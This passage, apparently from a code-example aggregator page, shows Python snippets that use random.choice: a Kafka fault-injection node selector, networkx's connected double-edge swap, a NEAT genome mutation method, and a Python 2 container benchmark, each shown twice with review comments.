            return random.choice(self.helper.get_isr(topic, partition))

        elif failure.get_node_type() == "RANDOM_LEADER":
            # Leader of a random partition of a random topic.
            topic = self.helper.get_topic()
            partition = self.helper.get_partition(topic)
            message = ("Selecting a Leader for a"
                       " Random Topic : {0},"
                       " Random Partition : {1}").format(topic, partition)
            self.logger_instance.logit("INFO", message, log_level="VERBOSE")
            return self.helper.get_leader(topic, partition)

        elif failure.get_node_type() == "LEADER":
            # Leader of the specified topic (specified or random partition).
            topic = failure.get_topic()
            # check if the partition is specified for the topic
            if failure.get_partition() is not None:
                partition = failure.get_partition()
                message = ("Selecting a Leader"
                           " for a Specified Topic"
                           " : {0}, Specified Partition"
                           " : {1}").format(topic, partition)
            else:
                # get a random partition
                partition = self.helper.get_partition(topic)
                message = ("Selecting a Leader"
                           " for a Specified Topic"
                           " : {0}, Random Partition"
                           " : {1}").format(topic, partition)
            self.logger_instance.logit("INFO", message, log_level="VERBOSE")
            return self.helper.get_leader(topic, partition)

        elif failure.get_node_type() == "CONTROLLER":
            self.logger_instance.logit("INFO",
                                       "Selecting Controller",
                                       log_level="VERBOSE")
            return self.helper.get_controller()
Example 25

Project: networkx
Source File: swap.py
View license
def connected_double_edge_swap(G, nswap=1, _window_threshold=3):
    """Attempts the specified number of double-edge swaps in the graph `G`.

    A double-edge swap removes two randomly chosen edges `(u, v)` and `(x,
    y)` and creates the new edges `(u, x)` and `(v, y)`::

     u--v            u  v
            becomes  |  |
     x--y            x  y

    If either `(u, x)` or `(v, y)` already exist, then no swap is performed
    so the actual number of swapped edges is always *at most* `nswap`.

    Parameters
    ----------
    G : graph
       An undirected graph

    nswap : integer (optional, default=1)
       Number of double-edge swaps to perform

    _window_threshold : integer

       The window size below which connectedness of the graph will be checked
       after each swap.

       The "window" in this function is a dynamically updated integer that
       represents the number of swap attempts to make before checking if the
       graph remains connected. It is an optimization used to decrease the
       running time of the algorithm in exchange for increased complexity of
       implementation.

       If the window size is below this threshold, then the algorithm checks
       after each swap if the graph remains connected by checking if there is a
       path joining the two nodes whose edge was just removed. If the window
       size is above this threshold, then the algorithm performs all the
       swaps in the window and only then checks if the graph is still connected.

    Returns
    -------
    int
       The number of successful swaps

    Raises
    ------

    NetworkXError

       If the input graph is not connected, or if the graph has fewer than four
       nodes.

    Notes
    -----

    The initial graph `G` must be connected, and the resulting graph is
    connected. The graph `G` is modified in place.

    References
    ----------
    .. [1] C. Gkantsidis and M. Mihail and E. Zegura,
           The Markov chain simulation method for generating connected
           power law random graphs, 2003.
           http://citeseer.ist.psu.edu/gkantsidis03markov.html
    """
    if not nx.is_connected(G):
        raise nx.NetworkXError("Graph not connected")
    if len(G) < 4:
        raise nx.NetworkXError("Graph has less than four nodes.")
    n = 0
    swapcount = 0
    # (removed unused local `deg = G.degree()`)
    # Label key for nodes
    dk = list(n for n, d in G.degree())
    cdf = nx.utils.cumulative_distribution(list(d for n, d in G.degree()))
    window = 1
    while n < nswap:
        wcount = 0
        swapped = []
        # If the window is small, we just check each time whether the graph is
        # connected by checking if the nodes that were just separated are still
        # connected.
        if window < _window_threshold:
            # This Boolean keeps track of whether there was a failure or not.
            fail = False
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                # If G remains connected...
                if nx.has_path(G, u, v):
                    wcount += 1
                # Otherwise, undo the changes.
                else:
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                    fail = True
            # If one of the swaps failed, reduce the window size.
            if fail:
                window = int(math.ceil(window / 2))
            else:
                window += 1
        # If the window is large, then there is a good chance that a bunch of
        # swaps will work. It's quicker to do all those swaps first and then
        # check if the graph remains connected.
        else:
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                wcount += 1
            # If the graph remains connected, increase the window size.
            if nx.is_connected(G):
                window += 1
            # Otherwise, undo the changes from the previous window and decrease
            # the window size.
            else:
                while swapped:
                    (u, v, x, y) = swapped.pop()
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                window = int(math.ceil(window / 2))
    return swapcount

Example 26

Project: networkx
Source File: swap.py
View license
def connected_double_edge_swap(G, nswap=1, _window_threshold=3):
    """Attempts the specified number of double-edge swaps in the graph `G`.

    A double-edge swap removes two randomly chosen edges `(u, v)` and `(x,
    y)` and creates the new edges `(u, x)` and `(v, y)`::

     u--v            u  v
            becomes  |  |
     x--y            x  y

    If either `(u, x)` or `(v, y)` already exist, then no swap is performed
    so the actual number of swapped edges is always *at most* `nswap`.

    Parameters
    ----------
    G : graph
       An undirected graph

    nswap : integer (optional, default=1)
       Number of double-edge swaps to perform

    _window_threshold : integer

       The window size below which connectedness of the graph will be checked
       after each swap.

       The "window" in this function is a dynamically updated integer that
       represents the number of swap attempts to make before checking if the
       graph remains connected. It is an optimization used to decrease the
       running time of the algorithm in exchange for increased complexity of
       implementation.

       If the window size is below this threshold, then the algorithm checks
       after each swap if the graph remains connected by checking if there is a
       path joining the two nodes whose edge was just removed. If the window
       size is above this threshold, then the algorithm performs all the
       swaps in the window and only then checks if the graph is still connected.

    Returns
    -------
    int
       The number of successful swaps

    Raises
    ------

    NetworkXError

       If the input graph is not connected, or if the graph has fewer than four
       nodes.

    Notes
    -----

    The initial graph `G` must be connected, and the resulting graph is
    connected. The graph `G` is modified in place.

    References
    ----------
    .. [1] C. Gkantsidis and M. Mihail and E. Zegura,
           The Markov chain simulation method for generating connected
           power law random graphs, 2003.
           http://citeseer.ist.psu.edu/gkantsidis03markov.html
    """
    if not nx.is_connected(G):
        raise nx.NetworkXError("Graph not connected")
    if len(G) < 4:
        raise nx.NetworkXError("Graph has less than four nodes.")
    n = 0
    swapcount = 0
    # (removed unused local `deg = G.degree()`)
    # Label key for nodes
    dk = list(n for n, d in G.degree())
    cdf = nx.utils.cumulative_distribution(list(d for n, d in G.degree()))
    window = 1
    while n < nswap:
        wcount = 0
        swapped = []
        # If the window is small, we just check each time whether the graph is
        # connected by checking if the nodes that were just separated are still
        # connected.
        if window < _window_threshold:
            # This Boolean keeps track of whether there was a failure or not.
            fail = False
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                # If G remains connected...
                if nx.has_path(G, u, v):
                    wcount += 1
                # Otherwise, undo the changes.
                else:
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                    fail = True
            # If one of the swaps failed, reduce the window size.
            if fail:
                window = int(math.ceil(window / 2))
            else:
                window += 1
        # If the window is large, then there is a good chance that a bunch of
        # swaps will work. It's quicker to do all those swaps first and then
        # check if the graph remains connected.
        else:
            while wcount < window and n < nswap:
                # Pick two random edges without creating the edge list. Choose
                # source nodes from the discrete degree distribution.
                (ui, xi) = nx.utils.discrete_sequence(2, cdistribution=cdf)
                # If the source nodes are the same, skip this pair.
                if ui == xi:
                    continue
                # Convert an index to a node label.
                u = dk[ui]
                x = dk[xi]
                # Choose targets uniformly from neighbors.
                v = random.choice(list(G.neighbors(u)))
                y = random.choice(list(G.neighbors(x)))
                # If the target nodes are the same, skip this pair.
                if v == y:
                    continue
                if x not in G[u] and y not in G[v]:
                    G.remove_edge(u, v)
                    G.remove_edge(x, y)
                    G.add_edge(u, x)
                    G.add_edge(v, y)
                    swapped.append((u, v, x, y))
                    swapcount += 1
                n += 1
                wcount += 1
            # If the graph remains connected, increase the window size.
            if nx.is_connected(G):
                window += 1
            # Otherwise, undo the changes from the previous window and decrease
            # the window size.
            else:
                while swapped:
                    (u, v, x, y) = swapped.pop()
                    G.add_edge(u, v)
                    G.add_edge(x, y)
                    G.remove_edge(u, x)
                    G.remove_edge(v, y)
                    swapcount -= 1
                window = int(math.ceil(window / 2))
    return swapcount

Example 27

Project: peas
Source File: neat.py
View license
    def mutate(self, innovations={}, global_innov=0):
        """ Perform a mutation operation on this genotype. 
            If a dict with innovations is passed in, any
            add connection operations will be added to it,
            and checked to ensure identical innovation numbers.

            Exactly one kind of mutation is attempted per call: add-node,
            else add-connection, else weight/node-parameter perturbation.

            Gene layouts, as used throughout this method:
              conn_gene = [innov, from_node, to_node, weight, enabled]
              node_gene = [fforder, type, bias, response, layer]

            NOTE(review): the mutable default ``innovations={}`` is shared
            across calls that omit the argument -- confirm whether that
            accumulation is intentional before changing it.
        """
        # Continue innovation numbering from the highest number seen either
        # in this genome's connection genes or globally.
        maxinnov = max(global_innov, max(cg[0] for cg in self.conn_genes.values()))
        
        if len(self.node_genes) < self.max_nodes and rand() < self.prob_add_node:
            # Structural mutation 1: split an existing connection in two,
            # inserting a new node between its endpoints.
            possible_to_split = self.conn_genes.keys()
            # If there is a max depth, we can only split connections that skip a layer.
            # E.g. we can split a connection from layer 0 to layer 2, because the resulting
            # node would be in layer 1. We cannot split a connection from layer 1 to layer 2,
            # because that would create an intra-layer connection.
            if self.max_depth is not None:
                possible_to_split = [(fr, to) for (fr, to) in possible_to_split if
                                        self.node_genes[fr][4] + 1 < self.node_genes[to][4]]
            if possible_to_split:
                # NOTE(review): random.choice over dict.keys() only works on
                # Python 2, where keys() returns a list.
                to_split = self.conn_genes[random.choice(possible_to_split)]
                to_split[4] = False # Disable the old connection
                fr, to, w = to_split[1:4]
                # Place the new node halfway between its endpoints in
                # feed-forward order.
                avg_fforder = (self.node_genes[fr][0] + self.node_genes[to][0]) * 0.5
                # We assign a random function type to the node, which is #weird
                # because I thought that in NEAT these kind of mutations
                # initially don't affect the functionality of the network.
                new_type = random.choice(self.types)
                # We assign a 'layer' to the new node that is one lower than the target of the connection
                layer = self.node_genes[fr][4] + 1
                node_gene = [avg_fforder, new_type, 0.0, self.response_default, layer]
                new_id = len(self.node_genes)
                self.node_genes.append(node_gene)

                # Incoming half of the split gets weight 1.0; reuse the
                # innovation number if this exact connection was made before.
                if (fr, new_id) in innovations:
                    innov = innovations[(fr, new_id)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, new_id)] = maxinnov
                self.conn_genes[(fr, new_id)] = [innov, fr, new_id, 1.0, True]

                # Outgoing half of the split inherits the original weight w.
                if (new_id, to) in innovations:
                    innov = innovations[(new_id, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(new_id, to)] = maxinnov
                self.conn_genes[(new_id, to)] = [innov, new_id, to, w, True]
            
        # This is #weird, why use "elif"? but this is what
        # neat-python does, so I'm copying.
        elif rand() < self.prob_add_conn:
            # Structural mutation 2: add a connection between two nodes that
            # are not yet connected.  Targets exclude input nodes.
            potential_conns = product(xrange(len(self.node_genes)), xrange(self.inputs, len(self.node_genes)))
            potential_conns = (c for c in potential_conns if c not in self.conn_genes)
            # Filter further connections if we're looking only for FF networks
            if self.feedforward:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][0] < self.node_genes[t][0]) # Check FFOrder
            # Don't create intra-layer connections if there is a max_depth
            if self.max_depth is not None:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][4] < self.node_genes[t][4]) # Check Layer
            potential_conns = list(potential_conns)
            # If any potential connections are left
            if potential_conns:
                (fr, to) = random.choice(potential_conns)
                # Check if this innovation was already made, otherwise assign max + 1
                if (fr, to) in innovations:
                    innov = innovations[(fr, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, to)] = maxinnov
                conn_gene = [innov, fr, to, np.random.normal(0, self.stdev_mutate_weight), True]
                self.conn_genes[(fr, to)] = conn_gene
            
        else:
            # No structural change: independently perturb / reset / toggle
            # each connection gene...
            for cg in self.conn_genes.values():
                if rand() < self.prob_mutate_weight:
                    cg[3] += np.random.normal(0, self.stdev_mutate_weight)
                    cg[3] = np.clip(cg[3], self.weight_range[0], self.weight_range[1])

                if rand() < self.prob_reset_weight:
                    cg[3] = np.random.normal(0, self.stdev_mutate_weight)
                    
                if rand() < self.prob_reenable_conn:
                    cg[4] = True

                if rand() < self.prob_disable_conn:
                    cg[4] = False
                    
            # Mutate non-input nodes
            for node_gene in self.node_genes[self.inputs:]:
                if rand() < self.prob_mutate_bias:
                    node_gene[2] += np.random.normal(0, self.stdev_mutate_bias)
                    node_gene[2] = np.clip(node_gene[2], self.weight_range[0], self.weight_range[1])
                    
                if rand() < self.prob_mutate_type:
                    node_gene[1] = random.choice(self.types)
                    
                if rand() < self.prob_mutate_response:
                    node_gene[3] += np.random.normal(0, self.stdev_mutate_response)
                    
        # Sanity check: no connection may terminate at an input node
        # (layer 0).
        for (fr, to) in self.conn_genes:
            if self.node_genes[to][4] == 0:
                raise Exception("Connection TO input node not allowed.")
        return self # For chaining

Example 28

Project: peas
Source File: neat.py
View license
    def mutate(self, innovations={}, global_innov=0):
        """ Perform a mutation operation on this genotype. 
            If a dict with innovations is passed in, any
            add connection operations will be added to it,
            and checked to ensure identical innovation numbers.

            Exactly one kind of mutation is attempted per call: add-node,
            else add-connection, else weight/node-parameter perturbation.

            Gene layouts, as used throughout this method:
              conn_gene = [innov, from_node, to_node, weight, enabled]
              node_gene = [fforder, type, bias, response, layer]

            NOTE(review): the mutable default ``innovations={}`` is shared
            across calls that omit the argument -- confirm whether that
            accumulation is intentional before changing it.
        """
        # Continue innovation numbering from the highest number seen either
        # in this genome's connection genes or globally.
        maxinnov = max(global_innov, max(cg[0] for cg in self.conn_genes.values()))
        
        if len(self.node_genes) < self.max_nodes and rand() < self.prob_add_node:
            # Structural mutation 1: split an existing connection in two,
            # inserting a new node between its endpoints.
            possible_to_split = self.conn_genes.keys()
            # If there is a max depth, we can only split connections that skip a layer.
            # E.g. we can split a connection from layer 0 to layer 2, because the resulting
            # node would be in layer 1. We cannot split a connection from layer 1 to layer 2,
            # because that would create an intra-layer connection.
            if self.max_depth is not None:
                possible_to_split = [(fr, to) for (fr, to) in possible_to_split if
                                        self.node_genes[fr][4] + 1 < self.node_genes[to][4]]
            if possible_to_split:
                # NOTE(review): random.choice over dict.keys() only works on
                # Python 2, where keys() returns a list.
                to_split = self.conn_genes[random.choice(possible_to_split)]
                to_split[4] = False # Disable the old connection
                fr, to, w = to_split[1:4]
                # Place the new node halfway between its endpoints in
                # feed-forward order.
                avg_fforder = (self.node_genes[fr][0] + self.node_genes[to][0]) * 0.5
                # We assign a random function type to the node, which is #weird
                # because I thought that in NEAT these kind of mutations
                # initially don't affect the functionality of the network.
                new_type = random.choice(self.types)
                # We assign a 'layer' to the new node that is one lower than the target of the connection
                layer = self.node_genes[fr][4] + 1
                node_gene = [avg_fforder, new_type, 0.0, self.response_default, layer]
                new_id = len(self.node_genes)
                self.node_genes.append(node_gene)

                # Incoming half of the split gets weight 1.0; reuse the
                # innovation number if this exact connection was made before.
                if (fr, new_id) in innovations:
                    innov = innovations[(fr, new_id)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, new_id)] = maxinnov
                self.conn_genes[(fr, new_id)] = [innov, fr, new_id, 1.0, True]

                # Outgoing half of the split inherits the original weight w.
                if (new_id, to) in innovations:
                    innov = innovations[(new_id, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(new_id, to)] = maxinnov
                self.conn_genes[(new_id, to)] = [innov, new_id, to, w, True]
            
        # This is #weird, why use "elif"? but this is what
        # neat-python does, so I'm copying.
        elif rand() < self.prob_add_conn:
            # Structural mutation 2: add a connection between two nodes that
            # are not yet connected.  Targets exclude input nodes.
            potential_conns = product(xrange(len(self.node_genes)), xrange(self.inputs, len(self.node_genes)))
            potential_conns = (c for c in potential_conns if c not in self.conn_genes)
            # Filter further connections if we're looking only for FF networks
            if self.feedforward:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][0] < self.node_genes[t][0]) # Check FFOrder
            # Don't create intra-layer connections if there is a max_depth
            if self.max_depth is not None:
                potential_conns = ((f, t) for (f, t) in potential_conns if 
                    self.node_genes[f][4] < self.node_genes[t][4]) # Check Layer
            potential_conns = list(potential_conns)
            # If any potential connections are left
            if potential_conns:
                (fr, to) = random.choice(potential_conns)
                # Check if this innovation was already made, otherwise assign max + 1
                if (fr, to) in innovations:
                    innov = innovations[(fr, to)]
                else:
                    maxinnov += 1
                    innov = innovations[(fr, to)] = maxinnov
                conn_gene = [innov, fr, to, np.random.normal(0, self.stdev_mutate_weight), True]
                self.conn_genes[(fr, to)] = conn_gene
            
        else:
            # No structural change: independently perturb / reset / toggle
            # each connection gene...
            for cg in self.conn_genes.values():
                if rand() < self.prob_mutate_weight:
                    cg[3] += np.random.normal(0, self.stdev_mutate_weight)
                    cg[3] = np.clip(cg[3], self.weight_range[0], self.weight_range[1])

                if rand() < self.prob_reset_weight:
                    cg[3] = np.random.normal(0, self.stdev_mutate_weight)
                    
                if rand() < self.prob_reenable_conn:
                    cg[4] = True

                if rand() < self.prob_disable_conn:
                    cg[4] = False
                    
            # Mutate non-input nodes
            for node_gene in self.node_genes[self.inputs:]:
                if rand() < self.prob_mutate_bias:
                    node_gene[2] += np.random.normal(0, self.stdev_mutate_bias)
                    node_gene[2] = np.clip(node_gene[2], self.weight_range[0], self.weight_range[1])
                    
                if rand() < self.prob_mutate_type:
                    node_gene[1] = random.choice(self.types)
                    
                if rand() < self.prob_mutate_response:
                    node_gene[3] += np.random.normal(0, self.stdev_mutate_response)
                    
        # Sanity check: no connection may terminate at an input node
        # (layer 0).
        for (fr, to) in self.conn_genes:
            if self.node_genes[to][4] == 0:
                raise Exception("Connection TO input node not allowed.")
        return self # For chaining

Example 29

Project: python-nlp
Source File: perftimings.py
View license
def main():
	"""Benchmark several container types (dict, defaultdict, list, typed
	arrays, two Counter implementations, numpy array) on initialization,
	access patterns, and counter-specific operations (arg_max, total_count,
	normalize).  Results are printed as "name: seconds" lines.

	Python 2 code (print statements, xrange); relies on module-level
	helpers (dict_init, rand_access, iter_access, ...) and the
	module-level flag test_iteration.
	"""
	key_src = range(10000)
	iter_src = array('i')

	# initialize random value/key initialization ordering
	for i in xrange(100000):
		key = random.choice(key_src)
		iter_src.append(key)

	#### Initialization
	print "Timing random initialization"

	last = time.time()
	td = dict_init(iter_src)
	print "%s: %f" % ("td", time.time()-last)
	last = time.time()
	tdd = defaultdict_init(iter_src)
	print "%s: %f" % ("tdd", time.time()-last)
	last = time.time()
	tl = list_init(iter_src)
	print "%s: %f" % ("tl", time.time()-last)
	last = time.time()
	tda = double_array_init(iter_src)
	print "%s: %f" % ("tda", time.time()-last)
	last = time.time()
	tla = long_array_init(iter_src)
	print "%s: %f" % ("tla", time.time()-last)
	last = time.time()
	cnt = counter_init(iter_src)
	print "%s: %f" % ("counter", time.time()-last)
	last = time.time()
	cCnt = cCounter_init(iter_src)
	print "%s: %f" % ("cCounter", time.time()-last)
	last = time.time()
	npa = npa_init(iter_src)
	print "%s: %f" % ("npa", time.time()-last)

	if test_iteration:

#### Random access
			print "Random Access"
			rand_access_src = array('i')
			for i in xrange(10000000):
				key = random.choice(key_src)
				rand_access_src.append(key)

				# NOTE(review): this timer reset sits INSIDE the
				# generation loop -- it looks like it should be dedented
				# one level to run once before the timing loop below.
				# Confirm intent before fixing.
				last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				rand_access(container, rand_access_src)
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Forward Iteration
			print "Iteration Access"
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				iter_access(container, 1000, 'values' in dir(container))
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride forward iteration (simulates sorted sparse index)
			print "Sparse Iteration Access"
			stride_src = sorted(rand_access_src)
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in stride_src:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride backward-forward iteration (simulates sorted sparse index)
			print "Sparse Forward/Backward Iteration Access"
			back = list(xrange(len(stride_src)))
			for i in xrange(len(stride_src)):
				back[i] = random.choice([True,False])

			access_order = list()
			current_pos = 0
			# NOTE(review): 'container' below is whatever was last bound by
			# the preceding timing loop; the modulus is taken against that
			# one container's length.  Verify this is intended.
			for (pos, stride) in enumerate(stride_src):
				if back[pos]: current_pos = (current_pos - stride) % len(container)
				else: current_pos = (current_pos + stride) % len(container)
				access_order.append(current_pos)

			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in access_order:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

	#### Test counter-specifics
	print "arg_max"
	last = time.time()

	# NOTE(review): zip() truncates to the shorter tuple, so npa is silently
	# dropped from this loop (it has no arg_max(); it is timed separately
	# via argmax() just below).  Likely a leftover -- confirm.
	for (container, name) in zip((cnt, cCnt, npa), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()

	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()

	# Normalize the counters in place (npa is normalized functionally via
	# divide), then re-run arg_max / total_count on the normalized values.
	print "normalize"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		container.normalize()
		print "%s: %f" % (name, time.time()-last)
		last = time.time()

	last = time.time()
	npa = divide(npa, npa.sum())
	print "%s: %f" % ("npa", time.time()-last)
	last = time.time()

	print "arg_max"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()

	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()
Example 30

Project: python-nlp
Source File: perftimings.py
View license
def main():
	"""Benchmark several container types (dict, defaultdict, list, typed
	arrays, two Counter implementations, numpy array) on initialization,
	access patterns, and counter-specific operations (arg_max, total_count,
	normalize).  Results are printed as "name: seconds" lines.

	Python 2 code (print statements, xrange); relies on module-level
	helpers (dict_init, rand_access, iter_access, ...) and the
	module-level flag test_iteration.
	"""
	key_src = range(10000)
	iter_src = array('i')

	# initialize random value/key initialization ordering
	for i in xrange(100000):
		key = random.choice(key_src)
		iter_src.append(key)

	#### Initialization
	print "Timing random initialization"

	last = time.time()
	td = dict_init(iter_src)
	print "%s: %f" % ("td", time.time()-last)
	last = time.time()
	tdd = defaultdict_init(iter_src)
	print "%s: %f" % ("tdd", time.time()-last)
	last = time.time()
	tl = list_init(iter_src)
	print "%s: %f" % ("tl", time.time()-last)
	last = time.time()
	tda = double_array_init(iter_src)
	print "%s: %f" % ("tda", time.time()-last)
	last = time.time()
	tla = long_array_init(iter_src)
	print "%s: %f" % ("tla", time.time()-last)
	last = time.time()
	cnt = counter_init(iter_src)
	print "%s: %f" % ("counter", time.time()-last)
	last = time.time()
	cCnt = cCounter_init(iter_src)
	print "%s: %f" % ("cCounter", time.time()-last)
	last = time.time()
	npa = npa_init(iter_src)
	print "%s: %f" % ("npa", time.time()-last)

	if test_iteration:

#### Random access
			print "Random Access"
			rand_access_src = array('i')
			for i in xrange(10000000):
				key = random.choice(key_src)
				rand_access_src.append(key)

				# NOTE(review): this timer reset sits INSIDE the
				# generation loop -- it looks like it should be dedented
				# one level to run once before the timing loop below.
				# Confirm intent before fixing.
				last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				rand_access(container, rand_access_src)
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Forward Iteration
			print "Iteration Access"
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				iter_access(container, 1000, 'values' in dir(container))
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride forward iteration (simulates sorted sparse index)
			print "Sparse Iteration Access"
			stride_src = sorted(rand_access_src)
			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in stride_src:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

			#### Random-stride backward-forward iteration (simulates sorted sparse index)
			print "Sparse Forward/Backward Iteration Access"
			back = list(xrange(len(stride_src)))
			for i in xrange(len(stride_src)):
				back[i] = random.choice([True,False])

			access_order = list()
			current_pos = 0
			# NOTE(review): 'container' below is whatever was last bound by
			# the preceding timing loop; the modulus is taken against that
			# one container's length.  Verify this is intended.
			for (pos, stride) in enumerate(stride_src):
				if back[pos]: current_pos = (current_pos - stride) % len(container)
				else: current_pos = (current_pos + stride) % len(container)
				access_order.append(current_pos)

			last = time.time()

			for (container, name) in zip((td, tdd, tl, tda, tla, cnt, cCnt, npa), ("td", "tdd", "tl", "tda", "tla", "cnt", "cCnt", "npa")):
				for pos in access_order:
					temp = container[pos]
				print "%s: %f" % (name, time.time()-last)
				last = time.time()

	#### Test counter-specifics
	print "arg_max"
	last = time.time()

	# NOTE(review): zip() truncates to the shorter tuple, so npa is silently
	# dropped from this loop (it has no arg_max(); it is timed separately
	# via argmax() just below).  Likely a leftover -- confirm.
	for (container, name) in zip((cnt, cCnt, npa), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()

	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()

	# Normalize the counters in place (npa is normalized functionally via
	# divide), then re-run arg_max / total_count on the normalized values.
	print "normalize"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		container.normalize()
		print "%s: %f" % (name, time.time()-last)
		last = time.time()

	last = time.time()
	npa = divide(npa, npa.sum())
	print "%s: %f" % ("npa", time.time()-last)
	last = time.time()

	print "arg_max"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.arg_max()
		print "%s: %f (%s)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.argmax()
	print "%s: %f (%s)" % ("npa", time.time()-last, temp)
	last = time.time()

	print "total_count"
	last = time.time()

	for (container, name) in zip((cnt, cCnt), ("cnt", "cCnt")):
		temp = container.total_count()
		print "%s: %f (%f)" % (name, time.time()-last, temp)
		last = time.time()

	last = time.time()
	temp = npa.sum()
	print "%s: %f (%f)" % ("npa", time.time()-last, temp)
	last = time.time()

Example 31

Project: cloud-init
